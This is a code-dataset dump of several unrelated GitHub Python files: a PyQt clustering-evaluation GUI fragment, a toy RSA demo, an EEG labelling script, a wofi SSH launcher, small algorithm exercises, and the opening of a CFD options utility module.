len(self.gt_dict) + 1):\r\n            item = QListWidgetItem()\r\n            item.setText(str(self.gt_dict[i][0]))\r\n            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n            self.d_view_external.addItem(item)    \r\n        self.nmi = QCheckBox(\"NMI\")\r\n        self.adjr = QCheckBox(\"Adjusted Rand\")\r\n        self.accu = QCheckBox(\"Accuracy\")\r\n        self.jacc = QCheckBox(\"Jaccard\")\r\n        \r\n        temp2.addWidget(self.nmi)\r\n        temp2.addWidget(self.adjr)\r\n        temp2.addWidget(self.accu)\r\n        temp2.addWidget(self.jacc)\r\n        \r\n        temp.addStretch(1)\r\n        temp.addWidget(self.d_view_external)\r\n        \r\n        self.l_view_external = QListWidget()\r\n        self.l_view_external.setWindowTitle(\"Label view\")\r\n        self.l_view_external.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n        \r\n        \r\n        \r\n        for i in range(1, len(self.label_b_dict) + 1 ):\r\n            item = QListWidgetItem()\r\n            item.setText(str(self.label_b_dict[i][0]))\r\n            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n            self.l_view_external.addItem(item)\r\n        \r\n        temp.addLayout(temp2)\r\n        temp.addWidget(self.l_view_external)\r\n        temp.addWidget(self.external_push)\r\n        self.externalLayout.setLayout(temp)\r\n        self.mdi.addSubWindow(self.externalLayout)\r\n        self.mdi.cascadeSubWindows()\r\n        self.externalLayout.show()\r\n\r\n    def external_b(self):\r\n        data_validated = self.gt[self.d_view_external.selectedIndexes()[0].row()][0]\r\n        label_validated_index = []\r\n        for i in self.l_view_external.selectedIndexes():\r\n            label_validated_index.append(i.row())\r\n        print(\"DONE\")\r\n        for i in label_validated_index:\r\n            \r\n            labels_validated = self.label_b[i]\r\n            result_over_k = []\r\n            for label_validated in labels_validated:\r\n                result = []\r\n                num_k = np.unique(label_validated)\r\n                print(len(data_validated))\r\n                print(len(label_validated))\r\n                \r\n                if self.nmi.isChecked():\r\n                    result.append(normalized_mutual_info_score(data_validated, label_validated))\r\n                else:\r\n                    result.append(\"NA\")\r\n                if self.adjr.isChecked():\r\n                    result.append(adjusted_rand_score(data_validated, label_validated))\r\n                else:\r\n                    result.append(\"NA\")\r\n                if self.accu.isChecked():\r\n                    result.append(accuracy(data_validated, label_validated))\r\n                else:\r\n                    result.append(\"NA\")\r\n                if self.jacc.isChecked():\r\n                    result.append(jaccard_similarity_score(data_validated, label_validated))\r\n                else:\r\n                    result.append(\"NA\")\r\n                result_over_k.append(result)\r\n                temp = [self.gt_dict[self.d_view_external.selectedIndexes()[0].row() + 
1][0], self.label_b_dict[i+1][0]+ str(len(num_k))] \r\n temp.extend(result)\r\n self.external_dict[len(self.external_dict) + 1 ] = temp\r\n self.external_index.append(result_over_k)\r\n self.external_dict_b[len(self.external_dict_b) + 1 ] = self.label_b_dict[i+1][0]\r\n print(\"DONE\")\r\n \r\n# \r\n def exportInternal(self):\r\n temp = QVBoxLayout()\r\n self.exportInternalLayout = QWidget()\r\n self.internal_view_export = QListWidget()\r\n self.internal_export_push = QPushButton(\"Export\")\r\n self.internal_export_push.clicked.connect(self._exportInternal)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.internal_view_export.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n self.internal_view_export.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.internal_dict_b) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.internal_dict_b[i]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.internal_view_export.addItem(item)\r\n temp.addStretch(1)\r\n temp.addWidget(self.internal_view_export)\r\n temp.addWidget(self.internal_export_push)\r\n self.exportInternalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.exportInternalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.exportInternalLayout.show()\r\n \r\n def _exportInternal(self):\r\n selected_data = []\r\n for i in self.internal_view_export.selectedIndexes():\r\n selected_data.append(i.row())\r\n name_to_export = [self.internal_dict_b[i+1] + 'internal.csv' for i in selected_data]\r\n internal_to_export = [self.internal_index[i] for i in selected_data]\r\n if len(self.internal_view_export.selectedIndexes()) == 0:\r\n print(\"EMPTY\")\r\n else:\r\n for i in range(len(selected_data)):\r\n to_export = np.transpose(internal_to_export[i])\r\n print(to_export)\r\n to_export = table_result(to_export,[['k' + str(i) for i in range(2, len(to_export[0]) + 2 )]] ,[['','Sil', 'Db', 'Xb', 'Dunn', 'CH', \"I\", \"SD\", \"SDb_w\", \"CVNN\"]] )\r\n \r\n writeRows(name_to_export[i] , to_export)\r\n\r\n def exportExternal(self):\r\n temp = QVBoxLayout()\r\n self.exportExternalLayout = QWidget()\r\n self.external_view_export = QListWidget()\r\n self.external_export_push = QPushButton(\"Export\")\r\n self.external_export_push.clicked.connect(self._exportExternal)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.external_view_export.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n self.external_view_export.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.external_dict_b) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.external_dict_b[i]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.external_view_export.addItem(item)\r\n temp.addStretch(1)\r\n temp.addWidget(self.external_view_export)\r\n temp.addWidget(self.external_export_push)\r\n self.exportExternalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.exportExternalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.exportExternalLayout.show()\r\n \r\n def _exportExternal(self):\r\n selected_data = []\r\n for i in self.external_view_export.selectedIndexes():\r\n selected_data.append(i.row())\r\n print(selected_data)\r\n name_to_export = [self.external_dict_b[i+1] + 'external.csv' for i in 
selected_data]\r\n        print(name_to_export)\r\n        external_to_export = [self.external_index[i] for i in selected_data]\r\n        print(external_to_export)\r\n        if len(self.external_view_export.selectedIndexes()) == 0:\r\n            print(\"EMPTY\")\r\n        else:\r\n            for i in range(len(selected_data)):\r\n                to_export = np.transpose(external_to_export[i])\r\n                print(to_export)\r\n                to_export = table_result(to_export,[['k' + str(i) for i in range(2, len(to_export[0]) + 2 )]] ,[['','NMI', 'Adjusted Rand', \"Accuracy\", \"Jaccard\"]] )\r\n                \r\n                writeRows(name_to_export[i] , to_export)\r\n        \r\n    def exportLabel(self):\r\n        temp = QVBoxLayout()\r\n        self.exportLabelLayout = QWidget()\r\n        self.label_view_export = QListWidget()\r\n        self.label_export_push = QPushButton(\"Export\")\r\n        self.label_export_push.clicked.connect(self._exportLabel)\r\n        \r\n#        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n#        d_view.setRowCount(len(data))\r\n#        d_view.setColumnCount(5)\r\n#        d_view.setHorizontalHeaderLabels(h)\r\n        self.label_view_export.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n        self.label_view_export.setWindowTitle(\"Data view\")\r\n        for i in range(1, len(self.label_b_dict) + 1 ):\r\n            item = QListWidgetItem()\r\n            item.setText(str(self.label_b_dict[i][0]))\r\n            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n            self.label_view_export.addItem(item)\r\n        temp.addStretch(1)\r\n        temp.addWidget(self.label_view_export)\r\n        temp.addWidget(self.label_export_push)\r\n        self.exportLabelLayout.setLayout(temp)\r\n        self.mdi.addSubWindow(self.exportLabelLayout)\r\n        self.mdi.cascadeSubWindows()\r\n        self.exportLabelLayout.show()\r\n        \r\n    def _exportLabel(self):\r\n        selected_data = []\r\n        for i in self.label_view_export.selectedIndexes():\r\n            selected_data.append(i.row())\r\n        name_to_export = [self.label_b_dict[i+1][0] + '.csv' for i in selected_data]\r\n        print(name_to_export)\r\n        label_to_export = [self.label_b[i] for i in selected_data]\r\n        print(label_to_export)\r\n        if len(self.label_view_export.selectedIndexes()) == 0:\r\n            print(\"EMPTY\")\r\n        else:\r\n            for i in range(len(selected_data)):\r\n                writeRows(name_to_export[i], np.transpose(label_to_export[i]))\r\n        \r\n","repo_name":"clslabMSU/clustGUI","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":39396,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"39277134826","text":"import random\nfrom halo import Halo\n\ndef is_prime(num):\n    ans = True\n    for i in range(2, num):\n        if num % i == 0:\n            ans = False\n            break\n    return ans\n\n\ndef key_gen():\n    spinner = Halo(text=\"Generating key...\", spinner=\"dots\")\n    spinner.start()\n    \n    primes = [i for i in range(1000, 10000) if is_prime(i)]\n    p = random.choice(primes)\n    q = random.choice(primes)\n    while q == p:\n        q = random.choice(primes)  # p and q must differ, or fn below is computed incorrectly\n    n = p * q\n    fn = (p - 1) * (q - 1)\n\n    while True:\n        e = random.randint(2, n)\n        if e % 2 == 1:\n            relatively_prime = True\n            for i in range(2, e):\n                if e % i == 0 and fn % i == 0:\n                    relatively_prime = False\n                    break\n            if relatively_prime:\n                break\n\n    d = pow(e, -1, fn)  # modular inverse (Python 3.8+); e ** -1 would be a float\n    public_keys = [e, n]\n    private_keys = [d, n]\n\n    spinner.stop()\n    print(\"Key generated\")\n    \n    return [public_keys, private_keys]\n\n\ndef encrypt(text):\n    keys = key_gen()\n    public_keys = keys[0]\n    private_keys = keys[1]\n    \n    spinner = Halo(text=\"Encrypting...\", spinner=\"dots\")\n    spinner.start()\n    \n    e = public_keys[0]\n    n = public_keys[1]\n    cipher_text = pow(text, e, n)  # modular exponentiation avoids the huge intermediate text ** e\n\n    spinner.stop()\n    print(\"Encryption completed\")\n    \n    return [cipher_text, 
private_keys]\n\n\ndef decrypt(rsa):\n    spinner = Halo(text=\"Decrypting...\", spinner=\"dots\")\n    spinner.start()\n    \n    cipher_text = rsa[0]\n    private_keys = rsa[1]\n\n    d = private_keys[0]\n    n = private_keys[1]\n\n    original_text = pow(cipher_text, d, n)  # modular exponentiation, as in encrypt()\n    # original_text = [chr(char) for char in ascii_text]\n\n    spinner.stop()\n    print(\"Decryption completed\")\n    \n    return original_text\n\n\nplain_text = int(input(\"Enter plain text:\\n\"))\n# ascii_text = [ord(char) for char in plain_text]\nrsa = encrypt(plain_text)\n\ncipher_text = rsa[0]\nprint(f\"Cipher text is {cipher_text}\")\n\noriginal_text = decrypt(rsa)\nprint(f\"Original text is {original_text}\")","repo_name":"urmilshroff/cryptography","sub_path":"ciphers/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43586014328","text":"import mne\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef raw_eeg_pick(raw):\n    ch_names = raw.info[\"ch_names\"]\n    drop_ch_list = []\n    marker_list = ['T1', 'T2', 'STI', 'EMG', 'ECG', 'X', 'DC', 'Pulse', 'Wave', 'Mark', 'Sp', 'SP', 'EtCO', 'E', 'Cz']\n    # For some trials, Cz is problematic#\n    for ch_name in ch_names:\n        for marker in marker_list:\n            if marker in ch_name:\n                drop_ch_list.append(ch_name)\n                break\n    raw.drop_channels(drop_ch_list)\n    return raw\n\ndef minus_av(data):\n    data_av = np.mean(data, axis = 1)\n    data_minus_av = data - data_av\n    return data_minus_av\n\ndef normalization(data):\n    # subercui: should not minus mean again here\n    # for i in range(data.shape[1]):\n    #     mean = np.mean(data[0,i,:])\n    #     data[0,i,:] = data[0,i,:] - mean\n    normalizer = 0.0001\n    data = data / normalizer\n    return data\n\ndef loc_discharge(raw, annotations):\n    locs = []\n    if annotations:\n        data = raw.get_data()\n        data_annotation = data[44,:]\n        for annotation in annotations:\n            locs = locs + list(np.argwhere(data_annotation == annotation).reshape(-1))\n    return locs\n\nfile_list = [\"DA0570A0_1-1+.edf\",\n             \"DA0570A4_1-1+.edf\", \"DA0570A5_1-1+.edf\", \"DA0570A6_1-1+.edf\", \"DA0570A7_1-1+.edf\",\n             \"DA05709X_1-1+.edf\", \"DA05709Z_1-1+.edf\", \"DA10104A_1-1+.edf\",\n             \"DA10104D_1-1+.edf\", \"DA10104E_1-1+.edf\",\n             \"DA10104F_1-1+.edf\", \"DA10104G_1-1+.edf\", \"DA10104H_1-1+.edf\", \"DA10104I_1-1+.edf\",\n             \"DA10104J_1-1+.edf\", \"DA101049_1-1+.edf\"]\n\n    # DA10104A_1 is OK; DA05709R_1-1+.edf SOZ is on C4 F8; DA0570A6 is suitable for graph analysis, SOZ is on T3, T5, (F3, C3)\n    # Delete noisy data: \"DA0570A1_1-1+.edf\",[5], DA10104B_1-1+.edf [4],No label data: \"DA0570A2_1-1+.edf\",[3], \"DA0570A3_1-1+.edf\",[], loss label data: DA05709R_1-1+.edf [3], DA10104C_1-1+.edf,[3,4],\n\nannotation_list = [[4], [3], [3], [4], [3], [4], [3], [3,4],\n                   [3], [4], [3,4], [4], [4], [3], [3], [3,4]] # only s and S included\n\nx_pos_list = []\ny_pos_list = []\nx_neg_list = []\ny_neg_list = []\nfor file, annotations in zip(file_list, annotation_list):\n    raw = mne.io.read_raw_edf(file, preload=True)\n    locs = loc_discharge(raw, annotations)\n    raw = raw_eeg_pick(raw) # now only EEG channels\n    fig = raw.copy().set_eeg_reference(ref_channels=['A1', 'A2']).pick_types(meg=False, eeg=True).notch_filter(\n        freqs=50).filter(3, 70).resample(sfreq=200).plot()\n    print(file)\n    # np.savetxt(fname=file[:-4]+'label.txt', X=locs, 
fmt='%d')","repo_name":"subercui/pyGConvAT","sub_path":"EEG_data/label_generate.py","file_name":"label_generate.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35314850814","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nimport subprocess\nimport os\n\nssh_config_file = \"~/.ssh/config\"\n\n# Returns a list of all hosts\ndef get_hosts():\n\n hosts = []\n\n def parse_file(filename):\n with open(os.path.expanduser(filename)) as f:\n content = f.readlines()\n\n for line in content:\n line = line.lstrip()\n # Ignore wildcards\n if line.startswith('Host ') and not '*' in line:\n for host in line.split()[1:]:\n hosts.append(host)\n if line.startswith('Include ') and not '*' in line:\n filename = line.replace('Include ', '').rstrip()\n try:\n parse_file(filename)\n except OSError as e:\n print(e)\n\n parse_file(ssh_config_file)\n\n # Removes duplicate entries\n hosts = sorted(set(hosts))\n\n return hosts\n\n# Returns a newline seperated UFT-8 encoded string of all ssh hosts\ndef parse_hosts(hosts):\n return \"\\n\".join(hosts).encode(\"UTF-8\")\n\n# Executes wofi with the given input string\ndef show_wofi(hosts):\n\n command=\"wofi -p \\\"SSH hosts: \\\" -d -i --hide-scroll\"\n \n process = subprocess.Popen(command,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE)\n ret = process.communicate(input=hosts)\n host, rest = ret\n return host\n\n# Switches the focus to the given id\ndef ssh_to_host(host, terminal, ssh_command):\n command = \"{terminal} \\'{ssh_command} {host}\\'\".format(terminal=terminal, ssh_command=ssh_command, host=host)\n process = subprocess.Popen(command,shell=True)\n\n# Entry point\nif __name__ == \"__main__\":\n \n parser = ArgumentParser(description=\"Wofi based ssh launcher\")\n parser.add_argument(\"terminal\", help='Terminal command to use')\n parser.add_argument(\"--ssh-command\", dest='ssh_command', default='ssh', help='ssh command to use (default=ssh)')\n args = parser.parse_args()\n\n hosts = get_hosts()\n parsed_hosts = parse_hosts(hosts)\n \n selected = show_wofi(parsed_hosts)\n \n selected_host = selected.decode('utf-8').rstrip()\n ssh_to_host(selected_host, args.terminal, args.ssh_command)\n","repo_name":"coffebar/dotfiles","sub_path":"ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"10726650196","text":"#Heapsort in python\n\n#heapify function\n#let i = root index\ndef heapify(array, mSize, root, mLess = lambda x, y : x < y):\n\t#find largest element among root and children\n\tlargest = root\n\tleft = 2*root +1\n\tright = 2*root +2\n\n\tif left < mSize and mLess(array[largest], array[left]):\n\t\tlargest = left\n\tif right < mSize and mLess(array[largest], array[right]):\n\t\tlargest = right\n\n\t#swap between largest element and root element if root isn't the largest element\n\tif(largest != root):\n\t\tarray[root], array[largest] = array[largest], array[root]\n\t\theapify(array, mSize, largest, mLess)\n\n#heapSort function\ndef heapSort(array, mLess = lambda x, y : x < y):\n\t#build max heap\n\tn = len(array)\n\tfor i in range(n //2, -1, -1):\n\t\theapify(array, n , i, mLess)\n\t\n\tfor i in range(n -1, 0, -1):\n\t\t#swap\n\t\tarray[0], array[i] = array[i], array[0]\n\t\t#heapify root element\n\t\theapify(array, i, 0, 
mLess)\n\treturn","repo_name":"sarunnut1236/BasicSortingAlgorithms","sub_path":"heapSort/heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7936848571","text":"import sys\nsys.stdin = open('test.txt', 'r')\n\ndef solution(A):\n    A = sorted(set(A))\n\n    # drop non-positive values from the front; do not advance an index while popping\n    while A and A[0] <= 0:\n        A.pop(0)\n\n    i = 0\n    while i < len(A) and A[i] == i+1:\n        i += 1\n\n    return i+1\n\nA = [1, 3, 6, 4, 1, 2]\nprint(solution(A))","repo_name":"anyl92/ALGORITHM","sub_path":"codewars/191207_test1.py","file_name":"191207_test1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30920929585","text":"import os,sys\nwith open(os.path.join(sys.path[0], \"puzzleInput.txt\"), \"r\") as pInput:\n    lines = pInput.readlines()\ncleanList = []\nfor e in lines:\n    cleanList.append(e.strip())\n#gamma = most common bit\n#epsilon = least common bit\ndef findGamma(lines):\n    mostCommon = []\n    for j in range(len(lines[0])):\n        count = 0\n        for i in range(len(lines)):\n            count += int(lines[i][j])\n        \n        if count / len(lines) < 0.5:\n            mostCommon.append(\"0\")\n        else:\n            mostCommon.append(\"1\")\n    return int(\"\".join(mostCommon),base=2)\n\ndef findEpi(lines):\n    leastCommon = []\n    for j in range(len(lines[0])):\n        count = 0\n        for i in range(len(lines)):\n            count += int(lines[i][j])\n        \n        if count / len(lines) > 0.5:\n            leastCommon.append(\"0\")\n        else:\n            leastCommon.append(\"1\")\n    return int(\"\".join(leastCommon),base=2)\n\ndef power(lines):\n    return findEpi(lines) * findGamma(lines)\n\n\ndef countMost(lines, pos):\n    count0 = 0\n    count1 = 0\n    for e in lines:\n        if int(e[pos]) == 0:\n            count0 += 1\n        elif int(e[pos]) == 1:\n            count1 += 1\n    \n    if count0 > count1:\n        return 0\n    else:\n        return 1\n\ndef countLeast(lines,pos):\n    most = countMost(lines,pos)\n    if most == 1:\n        return 0\n    else:\n        return 1\n\n\ndef findOxygen(lines):\n    tempList = lines[:]\n    xpos = 0\n    while len(tempList) > 1:\n        most = countMost(tempList, xpos)\n        for i in reversed(range(len(tempList))):\n            if int(tempList[i][xpos]) != most:\n                del tempList[i]    \n        xpos += 1\n        if xpos == len(tempList[0]):\n            xpos = 0\n    \n    return int(tempList[0],base=2)\n    \ndef findCOO(lines):\n    tempList = lines[:]\n    xpos = 0\n    while len(tempList) > 1:\n        least = countLeast(tempList, xpos)\n        for i in reversed(range(len(tempList))):\n            if int(tempList[i][xpos]) != least:\n                del tempList[i]    \n        xpos += 1\n        if xpos == len(tempList[0]):\n            xpos = 0\n    \n    return int(tempList[0],base=2)\n    \n\ndef findLife(lines):\n    return findOxygen(lines) * findCOO(lines)\n\nprint(findLife(cleanList))","repo_name":"vrnprkh/AOC-2021","sub_path":"Day03/Day03.py","file_name":"Day03.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10580381611","text":"#Input\r\ncant=int(input(\"Digite cantidad de estudiantes: \"))\r\nPuntM=None #highest score\r\nPuntm=None #lowest score\r\nprom=0\r\nfor i in range(1,cant+1):\r\n    Nom=str(input(\"Digite el nombre del estudiante: \"))\r\n    Punt=float(input(\"Digite nota del estudiante:\"))\r\n    if Puntm is None or Punt<Puntm:\r\n        Puntm=Punt\r\n    if PuntM is None or Punt>PuntM:\r\n        PuntM=Punt\r\n    prom=prom+Punt\r\n\r\n    \r\n#Output\r\nprint(\"El nombre del estudiante es:\",Nom)\r\nprint(\"El promedio es:\",prom/cant)\r\nprint(\"El puntaje más alto:\",PuntM)\r\nprint(\"El puntaje 
más bajo:\",Puntm)","repo_name":"DinaTuesta27/taller4algoypromcontrolrepetitivo","sub_path":"Taller estructuras de control Repetitivas AyP4/Ejercicio_12.py","file_name":"Ejercicio_12.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30948475187","text":"r\"\"\"\n:mod:`cape.cfdx.options.util`: Utilities for options modules\n=============================================================\n\nThis module provides utilities for the CAPE options module. It includes\nthe :class:`cape.options.util.odict` class upon which all CAPE options\nclasses are based, and it several basic methods useful to processing\noptions.\n\nThe :func:`getel` and :func:`setel` methods in particular play an\nimportant role in the entire CAPE coding strategy.\n\n\"\"\"\n\n# Standard library modules\nimport copy\nimport functools\nimport io\nimport json\nimport os\nimport re\n\n# Third-party modules\nimport numpy as np\n\n\n# Local folders\nCAPE_OPTS_FOLDER = os.path.dirname(os.path.abspath(__file__))\nCAPE_FOLDER = os.path.dirname(CAPE_OPTS_FOLDER)\n\n# Get the root directory of the module.\n_fname = os.path.abspath(__file__)\n\n# Saved folder names\n_OptsFolder = os.path.split(_fname)[0]\n_CFDXFolder = os.path.split(_OptsFolder)[0]\n# Actual module home\nCapeFolder = os.path.split(_CFDXFolder)[0]\n# Parent folder\nBaseFolder = os.path.split(CapeFolder)[0]\n\n# Backup default settings\nrc = {\n \"nSubmit\": 10,\n \"Verbose\": False,\n \"GroupMesh\": False,\n \"ConfigFile\": \"Config.xml\",\n \"RefArea\": 1.0,\n \"RefLength\": 1.0,\n \"RefPoint\": [[0.0, 0.0, 0.0]],\n \"Xslices\": [0.0],\n \"Yslices\": [0.0],\n \"Zslices\": [0.0],\n \"nIter\": 100,\n \"PhaseSequence\": [[0]],\n \"PhaseIters\": [[200]],\n \"PythonExec\": None,\n \"WarmStart\": False,\n \"cfl\": 1.1,\n \"cflmin\": 0.8,\n \"nOrders\": 12,\n \"dt\": 0.1,\n \"qsub\": True,\n \"sbatch\": False,\n \"Resubmit\": False,\n \"Continue\": True,\n \"PreMesh\": False,\n \"y_is_spanwise\": True,\n \"db_stats\": 0,\n \"db_min\": 0,\n \"db_max\": 0,\n \"db_dir\": \"data\",\n \"db_nCut\": 200,\n \"Delimiter\": \",\",\n \"binaryIO\": True,\n \"tecO\": True,\n \"nProc\": 8,\n \"mpicmd\": \"mpiexec\",\n \"MPI\": False,\n \"TriFile\": \"Components.i.tri\",\n \"mesh2d\": False,\n \"dC\": 0.01,\n \"nAvg\": 100,\n \"nPlot\": None,\n \"nRow\": 2,\n \"nCol\": 2,\n \"FigWidth\": 8,\n \"FigHeight\": 6,\n \"PBS_j\": \"oe\",\n \"PBS_o\": None,\n \"PBS_e\": None,\n \"PBS_r\": \"n\",\n \"PBS_S\": \"/bin/bash\",\n \"PBS_select\": 1,\n \"PBS_ncpus\": 20,\n \"PBS_mpiprocs\": 20,\n \"PBS_model\": \"ivy\",\n \"PBS_aoe\": None,\n \"PBS_W\": \"\",\n \"PBS_q\": \"normal\",\n \"PBS_walltime\": \"8:00:00\",\n \"Slurm_A\": \"\",\n \"Slurm_C\": \"\",\n \"Slurm_gid\": \"\",\n \"Slurm_N\": 1,\n \"Slurm_n\": 20,\n \"Slurm_time\": \"8:00:00\",\n \"Slurm_shell\": \"/bin/bash\",\n \"Slurm_p\": \"normal\",\n \"ulimit_c\": 0,\n \"ulimit_d\": \"unlimited\",\n \"ulimit_e\": 0,\n \"ulimit_f\": \"unlimited\",\n \"ulimit_i\": 127812,\n \"ulimit_l\": 64,\n \"ulimit_m\": \"unlimited\",\n \"ulimit_n\": 1024,\n \"ulimit_p\": 8,\n \"ulimit_q\": 819200,\n \"uliimt_r\": 0,\n \"ulimit_s\": 4194304,\n \"ulimit_t\": \"unlimited\",\n \"ulimit_u\": 127812,\n \"ulimit_v\": \"unlimited\",\n \"ulimit_x\": \"unlimited\",\n \"ArchiveFolder\": \"\",\n \"ArchiveFormat\": \"tar\",\n \"ArchiveAction\": \"full\",\n \"ArchiveProgress\": True,\n \"ArchiveType\": \"full\",\n \"ArchiveTemplate\": \"full\",\n \"ArchiveFiles\": [],\n 
\"ArchiveGroups\": [],\n \"ProgressDeleteFiles\": [],\n \"ProgressDeleteDirs\": [],\n \"ProgressTarGroups\": [],\n \"ProgressTarDirs\": [],\n \"ProgressUpdateFiles\": [],\n \"ProgressArchiveFiles\": [],\n \"PreDeleteFiles\": [],\n \"PreDeleteDirs\": [],\n \"PreTarGroups\": [],\n \"PreTarDirs\": [],\n \"PreUpdateFiles\": [],\n \"PostDeleteFiles\": [],\n \"PostDeleteDirs\": [],\n \"PostUpdateFiles\": [],\n \"PostTarGroups\": [],\n \"PostTarDirs\": [],\n \"PostUpdateFiles\": [],\n \"SkeletonFiles\": [\"case.json\"],\n \"SkeletonTailFiles\": [],\n \"SkeletonTarDirs\": [],\n \"RemoteCopy\": \"scp\",\n \"TarPBS\": \"tar\",\n}\n\n# TriMap settings\nrc[\"atoldef\"] = 1e-2\nrc[\"rtoldef\"] = 1e-4\nrc[\"ctoldef\"] = 1e-4\nrc[\"ztoldef\"] = 5e-2\nrc[\"antoldef\"] = 3e-2\nrc[\"rntoldef\"] = 1e-4\nrc[\"cntoldef\"] = 1e-3\nrc[\"rztoldef\"] = 1e-5\n\n# Intersect options\nrc['intersect_rm'] = False\nrc['intersect_smalltri'] = 1e-4\nrc['intersect_triged'] = True\n\n# AFLR3 settings\nrc['aflr3_cdfr'] = 1.1\nrc['aflr3_cdfs'] = None\nrc['aflr3_mdf'] = 2\nrc['aflr3_mdsblf'] = 1\nrc['aflr3_nqual'] = 2\n\n\nARRAY_TYPE_NAMES = {'list', 'tuple', 'array', 'ndarray'}\n\n\n# Utility function to get elements sanely\ndef getel(x, i=None):\n r\"\"\" Return element *i* of an array if possible\n \n :Call:\n >>> x = getel(x)\n >>> xi = getel(x, i)\n :Inputs:\n *x*: number-like or list-like\n A number or list or NumPy vector\n *i*: ``None`` | :class:`int`\n Index\n :Outputs:\n *xi*: scalar\n Equal to ``x[i]`` if possible, ``x[-1]`` if *i* is greater\n than the length of *x*, or ``x`` if *x* is not a\n :class:`list` or :class:`numpy.ndarray` instance\n :Examples:\n >>> getel('abc', 2)\n 'abc'\n >>> getel(1.4, 0)\n 1.4\n >>> getel([200, 100, 300], 1)\n 100\n >>> getel([200, 100, 300], 15)\n 300\n >>> getel([200, 100, 300])\n 200\n :Versions:\n * 2014-07-29 ``@ddalle``: Version 1.0\n * 2021-10-18 ``@ddalle``: Version 1.1; add :class:`tuple`\n \"\"\"\n # Check the type.\n if i is None:\n return x\n if type(x).__name__ in ARRAY_TYPE_NAMES:\n # Check for empty input.\n if len(x) == 0:\n return None\n # Array-like\n if i:\n # Check the length.\n if i >= len(x):\n # Take the last element.\n return x[-1]\n else:\n # Take the *i*th element.\n return x[i]\n else:\n # Use the first element.\n return x[0]\n else:\n # Scalar\n return x\n\n\n# Utility function to set elements sanely\ndef setel(x, i, xi):\n r\"\"\"Return element *i* of an array if possible\n \n :Call:\n >>> y = setel(x, i, xi)\n \n :Inputs:\n *x*: number-like or list-like\n A number or list or NumPy vector\n *i*: :class:`int`\n Index. 
If *i* is ``None``, the output is reset to *xi*\n *xi*: scalar\n Value to set at index *i*\n :Outputs:\n *y*: number-like or list-like\n Input *x* with ``y[i]`` set to ``xi`` unless *i* is ``None``\n :Examples:\n >>> setel(['a', 2, 'c'], 1, 'b')\n ['a', 'b', 'c']\n >>> setel(['a', 'b'], 2, 'c')\n ['a', 'b', 'c']\n >>> setel('a', 2, 'c')\n ['a', 'a', 'c']\n >>> setel([0, 1], None, 'a')\n 'a'\n :Versions:\n * 2014-07-29 ``@ddalle``: Version 1.0\n * 2021-10-18 ``@ddalle``: Version 1.1; add :class:`tuple`\n \"\"\"\n # Check the index input.\n if i is None:\n # Scalar output\n return xi\n # Ensure list\n if type(x).__name__ in ARRAY_TYPE_NAMES:\n # Already a list; make a copy\n y = list(x)\n else:\n # Create a singleton list\n y = [x]\n # Get default value\n if len(y) > 0:\n # Select the last value\n ydef = y[-1]\n else:\n # Set ``None`` until we get something\n ydef = None\n # Make sure *y* is long enough.\n for j in range(len(y), i):\n y.append(ydef)\n # Check if we are setting an element or appending it\n if i >= len(y):\n # Append\n y.append(xi)\n else:\n # Set the value\n y[i] = xi\n # Output\n return y\n \n\n# Function to ensure scalar from above\ndef rc0(p):\n r\"\"\"Return default setting for named parameter\n \n :Call:\n >>> v = rc0(p)\n :Inputs:\n *p*: :class:`str`\n Name of parameter to extract\n :Outputs:\n *v*: any\n Either ``rc[p]`` or ``rc[p][0]``, 